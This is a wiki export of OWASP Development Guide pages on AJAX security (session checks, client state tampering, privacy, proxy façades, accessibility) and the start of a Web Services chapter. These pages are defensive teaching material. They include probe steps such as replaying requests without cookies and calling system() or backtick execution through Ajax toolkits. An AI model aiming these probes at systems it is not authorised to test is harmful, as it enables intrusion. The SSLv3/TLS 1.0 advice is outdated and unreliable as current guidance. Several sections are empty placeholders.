'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If you have transactions or calls that are not to be used by anonymous callers, check that client-side code cannot call them without an established user context.&lt;br /&gt;
&lt;br /&gt;
To do this: &lt;br /&gt;
&lt;br /&gt;
* Fire up your favorite proxy tool, such as WebScarab&lt;br /&gt;
&lt;br /&gt;
* Generate an authenticated XMLHttpRequest using the browser&lt;br /&gt;
&lt;br /&gt;
* Right click on the resulting entry in WebScarab, click “Re-send” &lt;br /&gt;
&lt;br /&gt;
* Edit out the cookie&lt;br /&gt;
&lt;br /&gt;
See if a valid result is returned. If yes, you are vulnerable. Repeat for every Ajax enabled server-side service.&lt;br /&gt;
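The WebScarab steps above amount to replaying the captured request with its Cookie header removed. A minimal sketch of that transform, assuming illustrative header names and values:

```javascript
// Remove any session cookies from a captured request's headers before
// replaying it. HTTP header names are case-insensitive, so compare in
// lower case.
function stripCookies(headers) {
  const replay = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== 'cookie') {
      replay[name] = value;
    }
  }
  return replay;
}

// A captured (hypothetical) authenticated request:
const captured = {
  Host: 'app.example.com',
  Cookie: 'PHPSESSID=abc123',
  'Content-Type': 'application/x-www-form-urlencoded',
};
const replayHeaders = stripCookies(captured);
```

If the replayed request still returns a valid result, the endpoint is trusting something other than the established session.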
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that every Ajax callable function, whether XMLRPC, custom code, or a web service, verifies the session and authorization. &lt;br /&gt;
&lt;br /&gt;
For example, in typical Ajax style, CPaint uses this insecure example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	return $sales_amount * 0.075;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Let’s add session authentication, authorization, data validation, and business rule validation: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// check that the session is logged in&lt;br /&gt;
&lt;br /&gt;
	assert_login();&lt;br /&gt;
&lt;br /&gt;
	// check that the user has the USER role to prevent&lt;br /&gt;
&lt;br /&gt;
	// guest and admin access&lt;br /&gt;
&lt;br /&gt;
	assert_role('USER');&lt;br /&gt;
&lt;br /&gt;
	// Validate data and business rules&lt;br /&gt;
&lt;br /&gt;
	if ( is_numeric($sales_amount) &amp;amp;&amp;amp; $sales_amount &amp;gt; 0 )&lt;br /&gt;
&lt;br /&gt;
	{&lt;br /&gt;
&lt;br /&gt;
		// Perform the calculation and return&lt;br /&gt;
&lt;br /&gt;
		return $sales_amount * 0.075;&lt;br /&gt;
&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
	// Data failed validation and business rules&lt;br /&gt;
&lt;br /&gt;
	return -1;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With these simple changes, we ensure that:&lt;br /&gt;
&lt;br /&gt;
* (Authentication) The user is logged on&lt;br /&gt;
&lt;br /&gt;
* (Authorization and Compliance) The user holds the correct role, providing SOX-compliant segregation of duties&lt;br /&gt;
&lt;br /&gt;
* (Data Validation) The data is safe to use in our calculation&lt;br /&gt;
&lt;br /&gt;
* (Business Rule Validation) The data is within acceptable business rule boundaries, as it is not a good idea to calculate tax for negative and zero values&lt;br /&gt;
&lt;br /&gt;
Obviously, performing a tax rate calculation is not that important, but if this were an insurance premium calculator (which uses highly sensitive actuarial data), this is the minimum you would expect to see for sensitive code.&lt;br /&gt;
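For readers working in JavaScript rather than PHP, the same guard pattern can be sketched as follows; the session object and the role name are stand-ins for whatever server-side session mechanism is actually in use:

```javascript
// Server-side tax calculation that refuses anonymous or unauthorized
// callers and validates its input before doing any work.
function calculateTax(session, salesAmount) {
  // Authentication: the caller must have a logged-in session
  if (!session || !session.loggedIn) {
    throw new Error('not authenticated');
  }
  // Authorization: only the USER role may call this function,
  // preventing guest and admin access
  if (!session.roles || !session.roles.includes('USER')) {
    throw new Error('not authorized');
  }
  // Data validation and business rules: a positive number only
  const amount = Number(salesAmount);
  if (!Number.isFinite(amount) || amount <= 0) {
    return -1;
  }
  // Perform the calculation and return
  return amount * 0.075;
}
```

The important property is that every check runs on the server, where the hostile client cannot reach it.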
&lt;br /&gt;
==Silent transactional authorization ==&lt;br /&gt;
&lt;br /&gt;
Any system that silently processes transactions using a single submission is dangerous to the client. For example, if a normal web application allows a simple URL submission, a preset session attack will allow the attacker to complete a transaction without the user’s authorization. In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page, so an injected attack script may be able to steal money from the client without authorization. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
Determine if the application:&lt;br /&gt;
&lt;br /&gt;
* Is vulnerable to DOM injection and can run arbitrary JavaScript&lt;br /&gt;
&lt;br /&gt;
* Runs in a browser that allows execution of loaded JavaScript via URL entry: navigate to the transaction submission page and type javascript:function(args) into the address bar. If the JavaScript is executed, it is likely that spyware will also be able to execute this code via the DOM model&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that all transactions are conducted with appropriate authorization, including transaction signing as necessary.&lt;br /&gt;
&lt;br /&gt;
==Untrusted or absent session data ==&lt;br /&gt;
&lt;br /&gt;
A common mis-implementation with Ajax is the desire to call a second server. &lt;br /&gt;
&lt;br /&gt;
[[Image:Ajax Second Server.gif]]&lt;br /&gt;
&lt;br /&gt;
Session data on the first server usually contains relatively trustworthy authentication and authorization information, as well as sensitive state, but in general, the second server cannot access this information in a timely or safe fashion. &lt;br /&gt;
&lt;br /&gt;
An example is an Ajax application running on &amp;lt;u&amp;gt;http://www.example.com&amp;lt;/u&amp;gt; whose Ajax code is able to directly process share trades on &amp;lt;u&amp;gt;http://market.somebiginvestmentfirm.com/&amp;lt;/u&amp;gt; via the use of embedded trust or embedded credentials. &lt;br /&gt;
&lt;br /&gt;
Attackers will be able to fraudulently perform transactions if there is no shared state between the two systems. This attack only requires that the attacker can tamper with embedded state on the client and that market.somebiginvestmentfirm.com foolishly trusts calls from Ajax callers without first checking with example.com. However, if example.com is simply one of hundreds of brokers, then this scenario is very unlikely to be secure no matter how it is sliced or diced. This particular scenario requires federated identity, which is discussed further in the Authentication chapter.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
You are vulnerable to this issue if:&lt;br /&gt;
&lt;br /&gt;
* Sensitive state is passed through the client to the second server in the foolish hope it will be trusted by the second server&lt;br /&gt;
&lt;br /&gt;
* The Ajax endpoints are hosted on a different server with unsharable session state&lt;br /&gt;
&lt;br /&gt;
* The second server is addressed by a URL that would prevent the cookies from the first session being used by the second server. Most browsers do not allow an application running on &amp;lt;u&amp;gt;ws.example.com&amp;lt;/u&amp;gt; to read cookies from &amp;lt;u&amp;gt;www.example.com&amp;lt;/u&amp;gt;. However, browsers will allow cookies to be read from &amp;lt;u&amp;gt;http://example.com&amp;lt;/u&amp;gt; but you should not rely on this as an attacker may spoof another URL such as attack.example.com and set cookies for example.com. &lt;br /&gt;
&lt;br /&gt;
* If the web service or other endpoint cannot obtain data from the first server’s session state for any other reason (such as incompatible technologies, like running a PHP web application and the Ajax application is trying to consume ASP.NET web services).&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
There are at least three methods to get around this issue:&lt;br /&gt;
&lt;br /&gt;
* Do not host the receiving end point on a different server; simply scale the entire application up (web services and all) on the same host. This allows trivially easy access to the trusted session state.&lt;br /&gt;
&lt;br /&gt;
* Stash the state in a database, and pass a cryptographically strong random key from the first server to the second server via the client. This method is far slower, more code intensive, and less scalable than the first solution.&lt;br /&gt;
&lt;br /&gt;
* Use federated authentication to provide a shared authorization context and verify it on the second server. This is usually very slow, but it is safe as long as the single sign-on (SSO) implementation is relatively secure and does not allow replay attacks.&lt;br /&gt;
&lt;br /&gt;
A solution that will not work is to simply pass the sensitive state via the client. A hostile client can tamper with the username, role, or any other sensitive state, so it cannot be trusted to transmit such data safely.&lt;br /&gt;
&lt;br /&gt;
==State management ==&lt;br /&gt;
&lt;br /&gt;
The DOM is designed to be manipulated and visible within the browser. It was never designed to be a secure storage area, but rather as a method of controlling how the page looks and behaves. Therefore, secure applications need to take care with client side storage of secure state.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
==Tamper resistance  ==&lt;br /&gt;
&lt;br /&gt;
If state is stored on the client, the attacker is able to easily manipulate this state using a DOM inspection tool, or simply by re-writing to their own API. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable: '''&lt;br /&gt;
&lt;br /&gt;
* Use DOM inspection tools like FireBug (https://addons.mozilla.org/firefox/1843/) – can you see client side state?&lt;br /&gt;
&lt;br /&gt;
* Can you change the state?&lt;br /&gt;
&lt;br /&gt;
* Use proxy tools, such as Paros, Spike Proxy, or WebScarab. When you see client-side state, can you modify it or inject interesting traffic? Does the server-side code detect the change in a reasonable way? &lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Do not bother obfuscating client side state – it requires more code and is trivially bypassed by advanced attackers&lt;br /&gt;
&lt;br /&gt;
* Applications should maintain a copy of all client-side state, and only accept back state that the user is authorized to change, such as form fields or settings which they can change in the web UI&lt;br /&gt;
&lt;br /&gt;
* Ensure that the action is authorized before performing any activity on submitted data&lt;br /&gt;
&lt;br /&gt;
* Include server-side validation, preferring white listing to blacklisting.&lt;br /&gt;
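The “accept back only state the user is authorized to change” rule can be sketched as a white-list merge against the server’s copy; the field names here are illustrative:

```javascript
// Fields the user is allowed to change from the browser. Everything
// else (role, account id, and so on) is taken from the server's copy,
// so tampering with it on the client has no effect.
const USER_EDITABLE = ['displayName', 'language'];

function mergeClientState(serverState, clientState) {
  const merged = { ...serverState };
  for (const field of USER_EDITABLE) {
    if (Object.prototype.hasOwnProperty.call(clientState, field)) {
      merged[field] = clientState[field];
    }
  }
  return merged;
}
```

White-listing the editable fields is preferable to black-listing the sensitive ones, because a field forgotten from a blacklist is exposed, while a field forgotten from a whitelist is merely read-only.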
&lt;br /&gt;
==Privacy  ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax clients use XMLHttpRequest with GET requests. These embed the data in the “URL”, and even though the data is generally not visible to the user, it is available in the browser history. &lt;br /&gt;
&lt;br /&gt;
Phishers favor GET requests. They love to use links embedded in e-mails. If coupled with poorly written code that does not assert authorization, such code will allow the phisher to commit an unauthorized transaction.&lt;br /&gt;
&lt;br /&gt;
Even if POSTs are used, private data can be cached in intermediate untrusted caches if the application uses HTTP rather than HTTPS connections. &lt;br /&gt;
&lt;br /&gt;
Most browsers have GET data limits, which can be as little as 2 KB. POSTs do not have this limitation, allowing far more data to be sent in any one request. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are at risk '''&lt;br /&gt;
&lt;br /&gt;
* Use a proxy tool, like Paros, Spike, or WebScarab to determine the mode of the Ajax interaction. If it is GET, you are potentially at risk.&lt;br /&gt;
&lt;br /&gt;
* Look at the data – does it contain details such as usernames, passwords, names, addresses, medical history, bank account, tax, or other private details? If so, you are at risk.&lt;br /&gt;
&lt;br /&gt;
* If you are sending sensitive data, can you access the Ajax endpoint via HTTP? If so, you are at risk from privacy breaches.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Generally, regardless of data value, use only POST requests. &lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode client example''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
var cp = new cpaint();&lt;br /&gt;
&lt;br /&gt;
cp.set_transfer_mode('POST');&lt;br /&gt;
&lt;br /&gt;
…&lt;br /&gt;
&lt;br /&gt;
cp.call('processCreditCard.php', 'setCCDetail', document.getElementById('creditcardnumber'), document.getElementById('creditcardexpiry'),&lt;br /&gt;
&lt;br /&gt;
document.getElementById('ccv'));&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''CPaint POST transfer mode server example''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
function setCCDetail($cc, $expiry, $ccv)&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// check that the session is logged in&lt;br /&gt;
&lt;br /&gt;
	assert_login();&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
	// check that the user has the USER role to prevent &lt;br /&gt;
&lt;br /&gt;
// guest and admin access&lt;br /&gt;
&lt;br /&gt;
	assert_role('USER');&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Validate data and business rules&lt;br /&gt;
&lt;br /&gt;
if ( is_credit_card($cc) &amp;amp;&amp;amp; is_expiry_date($expiry) &amp;amp;&amp;amp; is_numeric($ccv) )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
// Set the credit card details&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;cc = $cc;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;exp = $expiry;&lt;br /&gt;
&lt;br /&gt;
$this-&amp;gt;ccv = $ccv;&lt;br /&gt;
&lt;br /&gt;
return true;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// Data failed validation and business rules&lt;br /&gt;
&lt;br /&gt;
return false;&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Include server-side code that enforces the source of the data, so that it only comes from the POST, not from the request, GET, environment, or cookie data.&lt;br /&gt;
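Such enforcement can be sketched as a helper that reads parameters only from the parsed POST body; the request shape here is illustrative, not any particular framework’s API:

```javascript
// Read a named parameter strictly from the POST body. Query-string,
// cookie, and environment values with the same name are ignored, so an
// attacker cannot smuggle the value in via a GET link in an e-mail.
function postParam(request, name) {
  if (request.method !== 'POST' || !request.body) {
    return undefined;
  }
  return Object.prototype.hasOwnProperty.call(request.body, name)
    ? request.body[name]
    : undefined;
}
```

This is the JavaScript analogue of reading only $_POST in PHP rather than the permissive $_REQUEST.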
&lt;br /&gt;
If data transiting Ajax endpoints is protected by the users’ privacy laws, ensure that the data transits only over HTTPS using SSLv3 or TLS 1.0 or better and block HTTP communications.&lt;br /&gt;
&lt;br /&gt;
==Proxy Façade  ==&lt;br /&gt;
&lt;br /&gt;
Many toolkits, particularly PHP toolkits, allow you to register a class or function with the Ajax toolkit so that remote clients can call it; CPaint, for example, works in this manner. However, some toolkits are worse than others – they allow '''any''' in-context PHP function to be called, including system() and eval(). Others are not robust against PHP code injection – see below for more details.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If your toolkit works by registering classes or functions, try:&lt;br /&gt;
&lt;br /&gt;
* Calling a built-in function that was never registered, such as system() or printf()&lt;br /&gt;
&lt;br /&gt;
* Calling another function in your code, but one which has not been registered&lt;br /&gt;
&lt;br /&gt;
* Trying language features, such as backtick command execution (`) in PHP &lt;br /&gt;
&lt;br /&gt;
If any of these attacks work, your code (and any code using this framework) is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
In general, such methods of calling server side code are fraught with danger. It’s better to provide a limited interface, called a proxy façade, to only allow access to permitted functions. &lt;br /&gt;
&lt;br /&gt;
This would also allow authorization checks and basic validation to be performed before calling previously internal code. &lt;br /&gt;
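A proxy façade can be as simple as an explicit dispatch table: only functions deliberately registered in the table are reachable from the Ajax endpoint, and cross-cutting checks run once, before dispatch. A minimal sketch, with an illustrative registered function:

```javascript
// Only functions explicitly registered here can be called remotely;
// system(), eval(), and unregistered internal functions are unreachable.
const facade = {
  calculateTax: (session, amount) => Number(amount) * 0.075,
};

function dispatch(session, name, args) {
  // Authentication check happens once, before any registered function
  if (!session || !session.loggedIn) {
    throw new Error('not authenticated');
  }
  // hasOwnProperty guards against names inherited from Object.prototype
  if (!Object.prototype.hasOwnProperty.call(facade, name)) {
    throw new Error('no such remote function: ' + name);
  }
  return facade[name](session, ...args);
}
```

Per-function authorization and validation can then be layered inside each registered function, as shown earlier in this chapter.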
&lt;br /&gt;
==SOAP Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XMLRPC Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DOM Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XML Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==JSON (JavaScript Object Notation) Injection Attacks ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Encoding safety ==&lt;br /&gt;
&lt;br /&gt;
Ajax applications are particularly prone to encoding attacks as JavaScript understands several encodings (depending on the browser, locale and code page), whilst the scripting language itself is primitive when it comes to providing robust encoding and decoding utilities. &lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Do not rely on JavaScript's limited encoding and decoding capabilities on the client. Send data to the client pre-encoded, and correctly decode and validate any data received from it. &lt;br /&gt;
&lt;br /&gt;
For more details, see the Canonicalization chapter later in this book.&lt;br /&gt;
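For example, the server can emit user-supplied data already HTML-encoded, so the client never has to perform the encoding itself (a minimal Python sketch using the standard html module):&lt;br /&gt;

```python
import html

def render_fragment(user_supplied):
    # Encode on the server, before the fragment ever reaches
    # client-side JavaScript.
    return html.escape(user_supplied, quote=True)
```

With this in place, a payload such as a script tag arrives at the browser as inert entity-encoded text rather than executable markup.&lt;br /&gt;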
&lt;br /&gt;
==Auditing ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Accessibility ==&lt;br /&gt;
&lt;br /&gt;
Almost all Ajax toolkits and applications are inaccessible. They rarely pass even basic W3C WAI validation, and they do not offer accessible alternative paths. Some toolkits, such as Tibco General Interface, crash the browser if a larger text size is chosen. This is completely unacceptable and, worse, completely preventable. Providing a “rich” interface does not exempt an application from disability requirements. Based upon the US Census conducted in 2000, around 19.1% of the total US population has a disability of some kind (with similar levels elsewhere on the planet). Locking out nearly 20% of your potential users is unacceptable and is, in fact, illegal in most countries. &lt;br /&gt;
&lt;br /&gt;
Nearly all Western disability discrimination laws are the same – they require accessibility unless it is a justifiable hardship. They do not distinguish between open source or closed source, for profit or charitable, government or corporate – their application is universal.&lt;br /&gt;
&lt;br /&gt;
The techniques for creating accessible applications are widely known and have been documented for more than ten years. Accessibility evaluation tools are included or available as an option in every web development environment. As it does not cost a great deal to write new software to be accessible (the primary cost is in the testing), it is never a justifiable hardship to be accessible. &lt;br /&gt;
&lt;br /&gt;
Over the last few years, case law has firmly solidified on the side of the disabled (see the references, particularly the SOCOG / IBM decision). Deliberately writing inaccessible software today is negligent in the same way as constructing a new building without accessibility aids such as ramps and lifts for wheelchair access. This is not rocket science, it does not cost a lot of money to do, and, lastly, you may need it one day.&lt;br /&gt;
&lt;br /&gt;
'''How to identify if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
* Read the W3C WAI guidelines and ensure your application has alternate accessible paths, and adheres to basic accessibility guidelines.&lt;br /&gt;
&lt;br /&gt;
* Identify suitable evaluation tools for your development environment if it does not already contain them. Fix issues found by these tools and re-test.&lt;br /&gt;
&lt;br /&gt;
* Try the basic accessibility tools built into your operating system: check that your code works in high contrast and with different color schemes; resize the text elements in your browser (use the Control-+ key in Firefox, Text Size -&amp;gt; Larger in Internet Explorer 6.0, or the zoom control at the bottom right of the screen in IE 7); on Windows, set the font resolution to high DPI to emulate large fonts; choose large default fonts in the browser; use the screen magnification tool; and test with various basic screen readers. If your application fails any of these tests, you are vulnerable. &lt;br /&gt;
&lt;br /&gt;
* Once you are satisfied your application should have a reasonable shot at passing full testing, identify suitable accredited accessibility test firms or similarly qualified resources who can test your application using actual disability tools and provide qualified feedback. In general, unless your application is very simple, you should fix any issues found.&lt;br /&gt;
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
* Develop with accessibility in mind. Just like security, the sooner you do it, the cheaper this activity becomes and the more likely your application will be accessible.&lt;br /&gt;
&lt;br /&gt;
* Test in house regularly. If possible, employ staff or volunteers who require such accessibility; they will let you know the best choices for full-featured screen readers, Braille devices, magnification, and other accessibility aids. Let them test your application and provide feedback. &lt;br /&gt;
&lt;br /&gt;
* If you are likely to sell to corporate or government organizations, ensure that all applications are tested by an accredited accessibility testing firm. Fix all the issues they identify.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
AJAX Spell Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/13986/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
CPaint Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14565/discuss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
XML-RPC Command Injection Vulnerability&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/bid/14088/discuss&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maguire vs SOCOG/IBM, Nublog&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.contenu.nu/socog.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
W3C, Existing accessibility tools&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w3.org/WAI/ER/existingtools.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
US Census 2000: Disability Status 2000&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.census.gov/prod/2003pubs/c2kbr-17.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;br /&gt;
[[Category:AJAX]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59472</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59472"/>
				<updated>2009-04-26T12:06:12Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* .NET – Web Service Extensions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address them. Due to space limitations, it cannot examine all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader toward the appropriate usage patterns, and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some herald Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, viewing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw: let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable work to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format: one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
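As a sketch of the idea, the stock data above could be shipped as a small XML document that any consumer can parse regardless of language (illustrative Python; the element names are invented for the example):&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

def quote_to_xml(symbol, price):
    # Produce a plain XML document any consumer (Java, C#, ...) can
    # parse, regardless of how the producer serializes its objects.
    root = ET.Element("quote")
    ET.SubElement(root, "symbol").text = symbol
    ET.SubElement(root, "price").text = str(price)
    return ET.tostring(root, encoding="unicode")

def xml_to_quote(doc):
    # Any consumer performs the reverse mapping with its own XML parser.
    root = ET.fromstring(doc)
    return root.findtext("symbol"), float(root.findtext("price"))
```

A round trip through the text form recovers the original values, which is exactly the property that proprietary object serialization fails to provide across languages.&lt;br /&gt;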
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
